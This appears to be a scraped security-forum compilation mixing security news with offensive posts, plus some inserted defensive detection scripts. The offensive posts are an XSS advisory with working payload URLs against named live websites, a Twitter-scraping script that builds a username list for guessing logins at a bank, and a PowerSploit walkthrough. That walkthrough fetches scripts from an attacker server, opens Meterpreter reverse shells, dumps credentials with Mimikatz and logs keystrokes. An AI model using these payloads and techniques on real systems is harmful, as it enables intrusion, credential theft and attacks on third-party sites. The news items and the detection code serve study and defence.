Researchers have known for a long time that the North Korean government exerts serious control over the online movements of its citizens, but the details of how that system works provide an interesting look at the technical measures the country employs. “It is odd that they can do all of this off of one IP address. Perhaps they have some load balancing but ultimately running anything off of one IP address for a whole country is bad for many reasons.
DNS is far more resilient, but it also makes things slower, in a country with Internet connectivity that is probably already pretty slow. If I were to guess, the DPRK probably uses a proxy and splits off core functions by URL to various clusters of machines,” Hansen said. Source
-
Within hours on Thursday of WhiteHat Security releasing its Aviator browser to open source, a remote code execution vulnerability was disclosed, along with a handful of other coding issues that Google security engineers said jeopardized the security and privacy of Aviator’s users. Google’s public disclosure and subsequent public criticism over social media of Aviator–which is built upon the Chromium code base, the same one used by Google to build the Chrome browser–kicked off a tense back and forth between the $50-billion search giant and the small-by-comparison private security company.

WhiteHat responded this afternoon, acknowledging the bugs in its code, which it concedes may not be as “elegant” as Google Chrome’s. But the company does push back against Google’s assertion that the use of the Disconnect browser extension in Chrome, and tweaks to some privacy settings provide the same experience as Aviator. “We have made changes in Aviator that are beyond configuration, such as the browser’s ability to stop referring URLs from being sent cross domain as well as always being in private mode by default. But far more importantly, when we talk to average users it becomes clear that consumers can’t actually do what [Google] is suggesting,” said Hansen. “Most people do not know the first thing about Disconnect and therefore, they don’t know what they need to do to add it. Our argument all along has been that consumers need better options by default. They don’t even know what to search for to start learning how to protect themselves.”

Aviator was built with anonymity and security in mind. By default, it doesn’t allow tracking of a user’s browsing, and WhiteHat doesn’t have any partnerships with advertisers or tracking companies. It also has DuckDuckGo set as the default search engine, a major change from most other browsers, which typically have Google or Bing as the default. DuckDuckGo doesn’t save any search history data from users or perform any tracking.
Google engineer Tavis Ormandy, however, yesterday wasted no time diving into the Aviator code. He tweeted late yesterday afternoon that he’d discovered a remotely exploitable bug in the browser. WhiteHat founder and CEO Jeremiah Grossman said through his Twitter account that Google did not contact his company about the vulnerability or any of the issues described in a Google-Plus post by Justin Schuh, a Google security engineer working on the Chrome security team. “You probably shouldn’t be using the WhiteHat Aviator browser if you’re concerned about security and privacy,” Schuh wrote, pitting Chrome against Aviator throughout the post as a safer and better-resourced secure-browsing option.

The decision to go open source, WhiteHat Labs vice president Robert Hansen said, was a long time coming and was spurred on by privacy conscious users, including some in the Tor community, who wanted a similar browser built on Chromium. “For them, it would be a lot easier to start with a more secure browser that had removed a lot of the Google specific anti-privacy stuff, than to re-invent the wheel. So why not Aviator?,” Hansen wrote yesterday in making the open source announcement. Releasing Aviator to open source, Hansen said, was in part an effort to enlist the security community’s help in hardening the browser and perhaps narrowing the gap between it and Chrome, the security of which is key to supporting Google’s $50 billion annual revenue from online advertising.

Schuh, meanwhile, pointed to a number of changes made in Aviator from the Chromium code base that complicate the integration of security fixes. “That’s why Aviator is perennially at least two major releases behind Chrome, and ships with dozens of publicly disclosed vulnerabilities that are already fixed in the stable Chrome release,” Schuh said.
“Had these branding changes been made more carefully, this simply wouldn’t be a problem and Aviator would be able to pull upstream changes and benefit from the security work being done by the Chromium Project.” Schuh said the number of technical changes made in Aviator were relatively few, but created problems beyond Ormandy’s vulnerability. “The added code doesn’t seem to have been written with a sufficient understanding of how Chrome works, or with adequate regard for security,” Schuh said, pointing to one area where debug breaks were disabled. “In Chrome that call is expected to safely terminate sandboxed processes in a whole slew of situations where the process cannot safely recover, but in Aviator all of those cases have now been turned into potentially exploitable vulnerabilities,” he said. Schuh said a number of the changes made to Aviator are already available in the Chrome Disconnect extension, and with the benefit of incorporating any security fixes in Chromium. “In the end, I really hope this criticism is taken constructively, and provides some useful context for people who want to enhance Chrome,” Schuh said. “I’m always impressed by the size and passion of the Chromium community, and blown away by the number of people who contribute to and build projects on top of our codebase. But at the same time it’s very important that care be taken in those efforts to preserve the safety of end-users, even more so when making such bold claims about security and privacy.” Source
-
This is a simple script to infect images with PHP Backdoors for local file inclusion attacks. Download
-
@jetus "Anonymous" doesn't even exist, these are just some kids who filmed themselves to get attention... Anyway the "news" is quite funny, though it would have been better if you had posted it in Offtopic
-
Microsoft is to stop providing free Patch Tuesday notices to non-premier customers in a move labelled by some as "an assault on IT teams". The change relates to the Advance Notification Service (ANS) that provided organisations with information about upcoming Patch Tuesday releases. ANS gave businesses the chance to assess how the updates could affect their systems, and stop any update that could cause problems. However, Chris Betz, senior director of Microsoft's Security Response Center, said in a blog post that the company believes the majority of customers do not need the ANS information and let the updates happen automatically. “Customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimised testing and deployment methodologies,” he said. “While some customers still rely on ANS, the vast majority wait for Update Tuesday, or take no action, allowing updates to occur automatically.” As a result ANS will be made available only to those paying for the privilege. “We will provide ANS information directly to Premier customers and current organisations involved in our security programmes, and will no longer make this information broadly available through a blog post and web page,” said Betz. The decision drew anger from some in the security community. Ross Barrett, senior manager of security engineering at Rapid7, was scathing about the decision. “This is an assault on IT and IT security teams everywhere. Making this change without any lead up time is simply oblivious to the impact this will have in the real world,” he said. “Microsoft is basically going back to a message of ‘just blindly trust’ that we will patch everything for you. Honestly, it's shocking.” Wolfgang Kandek, chief technology officer of Qualys, also spoke up in defence of the ANS information. “I have always thought that our customers were interested in the information contained in ANS, but we will see how that works out,” he said. 
IT professionals on Twitter were also sceptical about the decision. Source
-
Hi Razvan, nice presentation! // you're the guy with the blog from 6 years ago
-
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability |
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/" |
|[*] Date: 2015-01-08 |
|[*] Exploit Author: Ashiyane Digital Security Team |
|[*] Vendor Homepage: https://pluginu.com/slideoptinprox/ |
|[*] Tested on: Windows 8.1, Kali Linux |
|-------------------------------------------------------------------------|
| |
|[*] Location: [localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS] |
|-------------------------------------------------------------------------|
|[*] Proof: |
|[*] http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |
|[*] http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |
|[*] http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |
|[*] http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |
|[*] http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E |
|-------------------------------------------------------------------------|
|[*] Discovered By: 4L1R3Z4 |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

Source
-
Many corporations are not aware of the types of data that can be found and used by attackers in the wild. The information that you will be able to find will vary from target to target, but will typically include items such as IP ranges, domain names, e-mail addresses, public financial data, organizational information, technologies used, job titles, phone numbers, usernames and much more. The primary goal of the passive gathering stage is to gather as much actionable data as possible while at the same time leaving few or no indicators that anyone has searched for the data. It takes time and patience to sort through web pages, perform Google hacking, and map systems thoroughly in an attempt to understand the infrastructure of a particular target.

In this article, let’s assume that we have a task to perform a penetration test for an online banking system to verify the ability of guessing valid usernames and passwords. If you were a hacker, what would you do? Speaking for myself, first I would write up a quick script to create a dictionary file for potential usernames. Secondly, I would find out the company password policy (like password length, number of special characters and so on), and based on that, I would build my own password dictionary file. Finally, I would automate the process to see if I can get a correct password or maybe perform a DoS and block the account after X number of failed attempts!!

Many users are using the same username for their bank account, Facebook, Twitter, and other social media. So let’s forge a small Python script to illustrate how an attacker could use ordinary publicly available information and build up a dictionary file which contains Twitter followers for Arab Bank. At the time of writing this article, Arab Bank has around 24,027 followers. Let’s bring them up!

**Disclaimer: all of the actions explained in this article are counted under Passive Information Gathering and considered legitimate.
We just spotlight a smart way of data collection.** Build your own dictionary file Twitter and many social websites have something called API < Application Programming Interface > which allows a programmer to write his own code to interact with Twitter and Get/Post information from/to Twitter. Fortunately we have many libraries in Python that make my job much easier, so all I need to do is to register in Twitter developers and use the developer ID/keys in my script to run. The registration process should be something similar to these snapshots: Tweepy is a Python third-party library allow us to parse Twitter’s data. Installing Tweepy is pretty easy: hkhrais@Hkhrais:~$ sudo apt-get install python-pip hkhrais@Hkhrais:~$ sudo pip install tweepy Source Code import tweepy import time #insert your Twitter keys here consumer_key ='blah blah blah' consumer_secret='blah blah blah' access_token='blah blah blah' access_secret='blah blah blah' auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_secret) api = tweepy.API(auth) list= open('/<a title="home" href="http://resources.infosecinstitute.com/">home</a>/hkhrais/Desktop/list.txt','w') if(api.verify_credentials): print 'We sucessfully logged in' user = tweepy.Cursor(api.followers, screen_name="arabbankgroup").items() while True: try: u = next(user) list.write(u.screen_name +' n') except: time.sleep(15*60) print 'We got a timeout ... Sleeping for 15 minutes' u = next(user) list.write(u.screen_name +' n') list.close() The code is almost self explanatory. I passed consumer/token keys to function “OauthHandler” to identify/authenticate myself to Twitter, and after that I asked to get the followers ID for ‘arabbankgroup’ and store it in variable “user”. According to the Twitter development paper, there’s a limit for how many requests a program can ask. In the case of getting the followers ID, we should wait around 15 minutes, otherwise a limit excess exception will show up. 
tweepy.error.TweepError: [{'message': 'Rate limit exceeded', 'code': 88}] Execution Output hkhrais@Hkhrais:~/Desktop/Tweets$ sudo python Twitter.py [sudo] password for hkhrais: We successfully logged in We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes We got a timeout ... Sleeping for 15 minutes ... We got a timeout ... Sleeping for 15 minutes Traceback (most recent call last): File "Twitter.py", line 31, in <module> u = next(user) File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 181, in next self.current_page = self.page_iterator.next() File "/usr/local/lib/python2.7/dist-packages/tweepy/cursor.py", line 64, in next raise StopIteration StopIteration hkhrais@Hkhrais:~/Desktop/Tweets$ Note that the last exception indicates iteration completion, which means we’ve grabbed the whole list of followers’ usernames the result: Conclusion Intelligence gathering requires careful planning, research, and, most importantly, the ability to think like an attacker. With a small Python script (around 25 lines), we could retrieve 24,027 followers’ usernames for @arabbankgroup which can be used as a good dictionary of usernames. Keep in mind that this script gets very handy, especially if our target usernames are non English! References • Twitter API https://dev.twitter.com/docs/twitter-libraries • Tweepy library https://pypi.python.org/pypi/tweepy/ Source
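An added example from the defending side of the scenario the article describes (a username dictionary fed into an automated login run, with account lockout as a side effect). It is not part of the article; the log format, field names and thresholds are constructed for illustration. It flags a source that fails against many distinct usernames within a short window (dictionary-driven guessing) and an account that accumulates enough failures to hit a lockout policy, which is the DoS the article mentions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not real data). One source tries six
# different usernames within seconds; another hits one account six times.
SAMPLE_LOG = """\
2015-01-08T10:00:01 login user=alice src=203.0.113.5 result=FAIL
2015-01-08T10:00:02 login user=bob src=203.0.113.5 result=FAIL
2015-01-08T10:00:03 login user=carol src=203.0.113.5 result=FAIL
2015-01-08T10:00:04 login user=dave src=203.0.113.5 result=FAIL
2015-01-08T10:00:05 login user=erin src=203.0.113.5 result=FAIL
2015-01-08T10:00:06 login user=frank src=203.0.113.5 result=FAIL
2015-01-08T10:00:30 login user=alice src=198.51.100.7 result=OK
2015-01-08T10:05:00 login user=grace src=192.0.2.9 result=FAIL
2015-01-08T10:05:01 login user=grace src=192.0.2.9 result=FAIL
2015-01-08T10:05:02 login user=grace src=192.0.2.9 result=FAIL
2015-01-08T10:05:03 login user=grace src=192.0.2.9 result=FAIL
2015-01-08T10:05:04 login user=grace src=192.0.2.9 result=FAIL
2015-01-08T10:05:05 login user=grace src=192.0.2.9 result=FAIL
"""

# Constructed line layout: ISO timestamp, then key=value fields.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) login user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$")


def parse(text):
    """Turn log text into (timestamp, user, src, result) tuples; unmatched lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["user"], m["src"], m["result"]))
    return events


def _burst(items, start, window):
    """Payloads of time-sorted (timestamp, payload) items that fall within `window` after `start`."""
    return [x for t, x in items if timedelta(0) <= t - start <= window]


def detect(events, window=timedelta(minutes=5), spray_users=5, lockout_threshold=5):
    """Return alerts as (rule, subject, count).

    dictionary-spray: one source fails against >= spray_users distinct usernames
                      inside `window` (a username list being tried in bulk).
    lockout-risk:     one username fails >= lockout_threshold times inside `window`,
                      i.e. the account is about to be locked out by policy.
    """
    fails_by_src = defaultdict(list)
    fails_by_user = defaultdict(list)
    for ts, user, src, result in sorted(events):
        if result == "FAIL":
            fails_by_src[src].append((ts, user))
            fails_by_user[user].append((ts, src))

    alerts = []
    for src, fails in fails_by_src.items():
        for ts, _ in fails:                      # slide the window over each failure
            distinct = set(_burst(fails, ts, window))
            if len(distinct) >= spray_users:
                alerts.append(("dictionary-spray", src, len(distinct)))
                break
    for user, fails in fails_by_user.items():
        for ts, _ in fails:
            n = len(_burst(fails, ts, window))
            if n >= lockout_threshold:
                alerts.append(("lockout-risk", user, n))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(alert)
```

The two rules are deliberately separate: a spray run usually stays below the per-account lockout threshold, which is exactly why a per-account counter alone misses it, while the per-account rule catches the lockout side effect.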
-
- 4
-
1. Introduction

HTTPS is used to make communication between the server and the browser secure. However, a problem occurs when an HTTPS page loads HTTP content: this is called mixed content vulnerability. There are two types, active and passive, discussed in this article. Finally, a demo page with this vulnerability is presented along with an exemplary detection method.

2. SSL/TLS – protecting the communication channel

First, we need to answer the following questions before discussing mixed content vulnerability: What is protected by HTTPS? What security properties are offered by HTTPS? What is the difference between HTTPS and HTTP? HTTPS uses SSL/TLS, which works between the application and the transport layers of the OSI model. SSL/TLS is used to protect the data of the application layer. The following properties are achieved when HTTPS is used: authentication, data integrity, confidentiality. This is fine for protection of data in the communication channel between the server and the browser. The problem appears when an HTTPS page loads HTTP content – HTTP is insecure, and attackers can read/modify HTTP traffic.

3. HTTPS page loading HTTP content

Protection of the communication channel between the server and the browser is one issue. Another issue is the content that is sent in this channel. Imagine an HTTPS page that loads the script over HTTP (mixed content vulnerability). Then the browser sends an HTTP request to get this script. Remember that HTTP is insecure – the attacker can read or modify the traffic. Let’s assume there is an attacker in the middle of the communication. The attacker sees the request and waits for the response from the server. When the response comes, the attacker modifies it and forwards to the user’s browser. This is how a man-in-the-middle (MITM) attack works. As a consequence, the content of the attacker’s choice is executed in the user’s browser.

4. Mixed content vulnerability (passive and active)

Let’s consider two cases – an HTTPS page which loads an image over HTTP (the first case), and an HTTPS page which loads the script via HTTP (the second case). Let’s discuss the first case. When the image is loaded over HTTP, the attacker can change this image. As a result, the appearance of the site is influenced. This is not very dangerous, because the attacker doesn’t change the behavior of the HTTPS page. However, data integrity is not preserved. This is an example of mixed passive content. Let’s now discuss the second case. This is a more dangerous scenario, because changing the script affects the behavior of the HTTPS page. This is an example of mixed active content.

5. Demonstration and detection of mixed content vulnerability

Microsoft prepared a demo with mixed content vulnerability [1] – you can go there and play with it (the certificate is invalid at the moment of writing this article, but it doesn’t matter from the perspective of mixed content vulnerability demonstration). You will also need a proxy to see requests/responses and tamper with responses (simulation of MITM attack). You can use Burp Proxy for this purpose. Burp Proxy is a part of Burp Suite, which is an integrated platform for web site security testing [2]. It turns out that the aforementioned HTTPS demo page loads the script via HTTP (just take a look at the source of this site). However, you don’t have to do this analysis manually. You can use the Opera browser, for example, to see the mixed content vulnerability warnings (go to the Console in Developer Tools). Below I present them for the aforementioned demo page (mixed active content in the red frame; the rest is mixed passive content).

6. Summary

HTTPS is used to protect the data of the application layer of the OSI model. However, the problem appears when the HTTPS page loads HTTP content, also known as mixed content vulnerability. Because HTTP is not secure, the attacker can launch a MITM (man-in-the-middle) attack. As a consequence, the attacker has an impact on the HTTP content that is delivered to the user’s browser. Two types of mixed content vulnerability were discussed – mixed active content (it can change the behavior of the HTTPS page) and mixed passive content (it doesn’t change the behavior of the HTTPS page, but affects its integrity). Finally, it was presented how the Opera browser can be used to detect mixed content vulnerability.

Finally, don’t hesitate to contact me on Twitter (@dawidczagan) if you have any questions or want me to discuss other security topics of your interest.

References
[1] Mixed content vulnerability – demo page prepared by Microsoft https://ie.microsoft.com/testdrive/browser/mixedcontent/assets/woodgrove.htm (access date: 5 January 2015)
[2] Burp Suite (access date: 5 January 2015)
Source
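An added example that does, in code, the check the article does with the Opera console: scan the HTML of an HTTPS page for sub-resources fetched over plain HTTP and label each one active or passive, following the article's split (scripts and stylesheets change behaviour, images only appearance). This is not part of the article; the sample page, host names and the element-to-category mapping are constructed for illustration, and the mapping is a reasonable subset rather than a browser's full list.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed HTTPS page URL and markup (not the Microsoft demo page).
PAGE_URL = "https://www.example.invalid/index.html"
SAMPLE_HTML = """\
<html><head>
<link rel="stylesheet" href="http://cdn.example.invalid/style.css">
<link rel="icon" href="http://cdn.example.invalid/favicon.ico">
<script src="http://cdn.example.invalid/app.js"></script>
<script src="https://cdn.example.invalid/safe.js"></script>
<script src="//cdn.example.invalid/proto-relative.js"></script>
</head><body>
<img src="http://images.example.invalid/logo.png">
<img src="/local/logo.png">
</body></html>
"""

# Elements whose HTTP sub-resource can change page behaviour (mixed active content).
ACTIVE = {"script": "src", "iframe": "src", "link": "href", "object": "data", "embed": "src"}
# Elements whose HTTP sub-resource only affects what is displayed (mixed passive content).
PASSIVE = {"img": "src", "audio": "src", "video": "src"}


class MixedContentScanner(HTMLParser):
    """Collects (kind, tag, absolute_url) for every sub-resource requested over http://."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ACTIVE:
            kind, attr = "active", ACTIVE[tag]
        elif tag in PASSIVE:
            kind, attr = "passive", PASSIVE[tag]
        else:
            return
        # Only stylesheet <link>s are executed as page style; icons etc. are skipped here.
        if tag == "link" and (attrs.get("rel") or "").lower() != "stylesheet":
            return
        url = attrs.get(attr)
        if not url:
            return
        # Resolve relative and protocol-relative references against the page URL:
        # "//cdn/x.js" on an HTTPS page is fetched over HTTPS and is not mixed content.
        absolute = urljoin(self.page_url, url)
        if urlsplit(absolute).scheme == "http":
            self.findings.append((kind, tag, absolute))


def scan(page_url, html):
    """Return mixed-content findings for `html` served at `page_url`.

    A page that is itself served over HTTP cannot have mixed content, so it yields nothing.
    """
    if urlsplit(page_url).scheme != "https":
        return []
    scanner = MixedContentScanner(page_url)
    scanner.feed(html)
    return scanner.findings


if __name__ == "__main__":
    for kind, tag, url in scan(PAGE_URL, SAMPLE_HTML):
        print("%-7s <%s> %s" % (kind, tag, url))
```

Run against the sample page it reports the stylesheet and the script as active and the logo as passive, and ignores the HTTPS, protocol-relative and same-origin references; the fix for every finding is the same, serve the resource over HTTPS or use a protocol-relative or relative URL.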
-
PowerSploit is a collection of PowerShell scripts which can prove to be very useful during some exploitation and mostly post-exploitation phases of a penetration test. To get the latest version of PowerSploit, visit this URL: https://github.com/mattifestation/PowerSploit

If you have GIT, then you can simply run the following command to get all files from the github repository:

git clone https://github.com/mattifestation/PowerSploit.git

To run PowerSploit scripts, you should have Microsoft PowerShell installed. It comes installed on Windows 7 and above operating system versions. Here, the current scenario is: we have a remote desktop connection to the victim machine (Windows 7 Ultimate 64-bit) which has PowerShell installed, and we run PowerSploit tools on it. For our ease to access and run PowerSploit scripts on the victim machine, we start a web server using Python:

python -m SimpleHTTPServer

Now all the files in the PowerSploit directory can easily be accessed over http://<ip_address>:8000/

PowerSploit has categorized all the scripts in a pretty clear and organized manner:

Category: Description
Antivirus Bypass: Find bytes of a file which has a matching signature in antivirus.
Code Execution: Used to execute code on victim machine.
Exfiltration: Manipulate and collect information & data from victim machine(s).
Persistence: Maintain control to machine by adding persistence to scripts.
PE Tools: Handy PowerShell cmdlets for enumeration.
Recon: Perform reconnaissance tasks using victim machine.
Reverse Engineering: Help perform reverse engineering & malware analysis. It has now been moved to PowerShellArsenal.
Script Modification: Create and manipulate scripts on victim machine.

In this article, as many PowerSploit scripts will be covered as possible. Those not covered are left for the reader to try and test. Depending upon the script you run, it might require a certain environment to work (like an Active Directory for some scripts in Exfiltration).
Install and run a PowerShell script:

IEX (New-Object Net.WebClient).DownloadString("http://<ip_address>/full_path/script_name.ps1")

This command when run in PowerShell will install that PowerShell script for the current process of PowerShell only.

Invoke-Shellcode

This cmdlet can be used to inject a custom shellcode or Metasploit payload into a new or existing process and execute it. The advantage of using this script is that it is not flagged by an antivirus, and no file is written on disk. We can easily install the Code Execution PowerShell script “Invoke-ShellCode” using:

Run the above command in a PowerShell window to install the “Invoke-Shellcode” script. To get some information about the module type:

Get-Help Invoke-Shellcode

Inject payload into the current PowerShell process and receive a Meterpreter Reverse HTTPS shell:

Also we had set up a Multi Handler exploit and compatible payload in Metasploit. Executing the above PowerSploit script will give us a Meterpreter shell. Please note that at the time of writing this article, only two Metasploit payloads are supported:

windows/meterpreter/reverse_http
windows/meterpreter/reverse_https

If you want to inject into some other process, you can either create a new process and then inject in it or inject inside an existing process.

Inject in an existing process: Get Process ID (PID) of a process using “Get-Process”. Note that the “Id” field is the Process ID (PID) of the corresponding process name. Inject the Metasploit payload into “svchost” process with PID 1228. Note that I have removed the “-Force” switch from the command, due to which it is asking for user confirmation now before injecting payload.
After injecting the shellcode, we receive a Meterpreter shell on the attacking machine, as shown below:

Inject in a new process: Create a new hidden process and inject the payload into it:

And we got a Meterpreter shell on the attacking machine:

Invoke-DllInjection

This cmdlet is used to inject a DLL file into an existing process using its Process ID (PID). Using this feature, a DLL can easily be injected in processes. The only disadvantage with this cmdlet is that it requires the DLL to be written on the disk. We can easily install the Code Execution PowerShell script “Invoke-DllInjection” using:

Generate the Metasploit Meterpreter DLL and download it on the server:

Upload this DLL onto the victim machine using an HTTP download or any other medium of your choice. Create a process in hidden mode and inject the DLL into it. We received a successful Meterpreter shell on the attacking machine:

Find-AVSignature

This cmdlet is used to split a file into specific byte sizes. The split bytes are stored in separate files, which will be detected by the installed antivirus and quarantined or removed. By noting the removed files, we can easily find the parts of file which have the AV signature. We can easily install the AntiVirus Bypass PowerShell script “Find-AVSignature” using:

Running “Find-AVSignature” on a Meterpreter Windows executable:

The installed antivirus detected malicious files and we can see bytes with the AV signature:

Now we can see the bytes of “msf.exe” containing AV signatures.

Get-DllLoadPath

This cmdlet can be used to find the path at which an executable looks for the DLL we are querying for. For example, we want to know at what location “cmd.exe” is looking for the “shell32.dll” DLL file. Using this information, we can replace the original DLL with a malicious DLL and get it executed to receive a reverse shell or any other task. This technique can be very useful for privilege escalation.
We can easily install the PE Tools PowerShell script “Find-DllLoadPath” using:

Find where “Acrobat.exe” loads “shell32.dll” DLL from:

Invoke-Portscan

This cmdlet is used to run a port scan on other hosts and find open ports. You will find a number of similarities between Nmap and this cmdlet, but not all. We can easily install the Recon PowerShell script “Invoke-Portscan” using:

Run a port scan for a list of hosts and ports:

There are a number of options using which you can customize the port scan. Use “Get-Help Invoke-PortScan –full” for all options. It also supports saving output in files just like Nmap (GNMAP, NMAP and XML) using -oG, -oX and -oA switches respectively.

Invoke-ReverseDnsLookup

This cmdlet is used to find the DNS PTR record for corresponding IP address(es). We can easily install the Recon PowerShell script “Invoke-ReverseDnsLookup” using:

Execute the cmdlet using the below command which accepts IP or IP range in “-IpRange” switch:

Unfortunately, it does not support comma separated values or file input of ranges like 173.194.117.1-50. It accepts only single IP or CIDR format for IP range.

Get-HttpStatus

This cmdlet is used to dictionary a web server to find HTTP Status of a path or file on HTTP/HTTPS service. It is not very feature rich and does not support a nested dictionary attack. It accepts a file containing path name or file name to check for HTTP Status on a web server. We can easily install the Recon PowerShell script “Get-HttpStatus” using:

Execute this cmdlet using the following command (the dictionary file is that of DirBuster):

If the website is running on SSL, you can use the “-UseSSL” switch to send HTTPS requests:

If the service is running on some other port like 8080, 8000, etc., for defining a port use the “-Port” switch. It is not as good as the DirBuster tool, but it’s good to have the PowerShell script too.

Get-Strings

This cmdlet is used to find Unicode or ASCII characters in a file.
It is similar to what we have in UNIX based systems, the “strings” utility. We can easily install the Reverse Engineering PowerShell script “Get-Strings” using:

Get-Strings -Path <file_name_with_path>

It is similar to the “strings” utility that we have in Linux. But here we have it for PowerShell. Note that Reverse Engineering has been moved from PowerSploit to PowerToolsArsenal (https://github.com/mattifestation/PowerShellArsenal) now.

Invoke-Mimikatz

This cmdlet is a port of the original Mimikatz project in PowerShell. The benefit of using this over the Mimikatz executable is that it remains in memory. It can be used to dump credentials, certificates, etc. from the local computer or other computers in the domain. It is one of the most useful PowerSploit tools in a penetration testing engagement. We can easily install the Exfiltration PowerShell script “Invoke-Mimikatz” using:

Dump credentials using:

Invoke-Mimikatz -DumpCreds

You can even dump credentials and certificates of other computers using -ComputerName @(“computer1,….)

Get-Keystrokes

This cmdlet is used to log the keystrokes which are pressed on the victim machine. It can be used as a keylogger. But all the logged keystrokes are stored in a local file by default (temp directory) or a custom location. We can easily install the Exfiltration PowerShell script “Get-Keystrokes” using:

This cmdlet can be executed using the following command:

Key log is stored in: c:\users\master\desktop\keylogger.txt

This script also supports “-CollectionInterval” using which you can define after how many minutes keystrokes should be captured. Do note that the key logging is very detailed, containing pressed button, username, application name and timestamp.

Invoke-NinjaCopy

This cmdlet is used to copy protected files which cannot be copied when the operating system is running.
We can easily install an Exfiltration PowerShell script “Invoke-NinjaCopy” using:

Execute “Invoke-NinjaCopy” using the following command to copy the protected “SAM” file:

When you try to perform the same operation using the “copy” command, the file cannot be copied:

Source
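An added example, not part of the article, looking at the same activity from the detection side. Every script in the walkthrough is loaded with the same in-memory download cradle (IEX ... DownloadString over plain HTTP), and the cmdlet names are distinctive, so PowerShell script block logging (the ScriptBlockText of event 4104 in the Microsoft-Windows-PowerShell/Operational log on PowerShell 5 and later) records exactly the strings a defender can match on. The sample script blocks, the IP address and the rule names below are constructed for illustration; the cmdlet names, payload names and the -Force and -DumpCreds switches are the ones used in the article.

```python
import re

# Constructed ScriptBlockText samples modelled on the article's commands (not real log data).
SAMPLE_BLOCKS = [
    'IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.5:8000/CodeExecution/Invoke-Shellcode.ps1")',
    'Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Force',
    'Invoke-Mimikatz -DumpCreds',
    'Get-ChildItem C:\\Users | Sort-Object Length',
    'iex (new-object net.webclient).downloadstring("http://10.0.0.5/Get-Keystrokes.ps1")',
    'Invoke-NinjaCopy -Path C:\\Windows\\System32\\config\\SAM -LocalDestination C:\\temp\\sam',
]

# Rule names are constructed for this example. Matching is case-insensitive because
# PowerShell is, so "iex" and "IEX" must be treated alike.
RULES = [
    # the exact install pattern from the article: Invoke-Expression of a downloaded string
    ("download-cradle",
     re.compile(r"(?i)\biex\b.*new-object\s+(system\.)?net\.webclient.*downloadstring")),
    # cmdlet names covered in the article
    ("powersploit-cmdlet",
     re.compile(r"(?i)\b(Invoke-Shellcode|Invoke-DllInjection|Invoke-Mimikatz|Invoke-NinjaCopy|"
                r"Get-Keystrokes|Invoke-Portscan|Find-AVSignature)\b")),
    # a .ps1 fetched over cleartext HTTP, regardless of how it is then executed
    ("cleartext-ps1-download", re.compile(r"(?i)http://\S+\.ps1")),
]


def classify(script_block):
    """Return the names of all rules that match one script block, in RULES order."""
    return [name for name, rx in RULES if rx.search(script_block)]


def triage(script_blocks):
    """Return (matched_rules, script_block) for every block that matched at least one rule."""
    hits = []
    for block in script_blocks:
        names = classify(block)
        if names:
            hits.append((names, block))
    return hits


if __name__ == "__main__":
    for names, block in triage(SAMPLE_BLOCKS):
        print(", ".join(names), "::", block)
```

The cradle rule is the most durable of the three: the cmdlet list has to be maintained as scripts are renamed or moved (the article itself notes Reverse Engineering moving to another repository), whereas the IEX-plus-WebClient pattern is the mechanism the whole workflow depends on.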
-
- 1
-
Amid all the noise the Sony hack generated over the holidays, a far more troubling cyber attack was largely lost in the chaos. Unless you follow security news closely, you likely missed it. I’m referring to the revelation, in a German report released just before Christmas (.pdf), that hackers had struck an unnamed steel mill in Germany. They did so by manipulating and disrupting control systems to such a degree that a blast furnace could not be properly shut down, resulting in “massive”—though unspecified—damage.

This is only the second confirmed case in which a wholly digital attack caused physical destruction of equipment. The first case, of course, was Stuxnet, the sophisticated digital weapon the U.S. and Israel launched against control systems in Iran in late 2007 or early 2008 to sabotage centrifuges at a uranium enrichment plant. That attack was discovered in 2010, and since then experts have warned that it was only a matter of time before other destructive attacks would occur. Industrial control systems have been found to be rife with vulnerabilities, though they manage critical systems in the electric grid, in water treatment plants and chemical facilities and even in hospitals and financial networks. A destructive attack on systems like these could cause even more harm than at a steel plant.

It’s not clear when the attack in Germany took place. The report, issued by Germany’s Federal Office for Information Security (or BSI), indicates the attackers gained access to the steel mill through the plant’s business network, then successively worked their way into production networks to access systems controlling plant equipment. The attackers infiltrated the corporate network using a spear-phishing attack—sending targeted email that appears to come from a trusted source in order to trick the recipient into opening a malicious attachment or visiting a malicious web site where malware is downloaded to their computer.
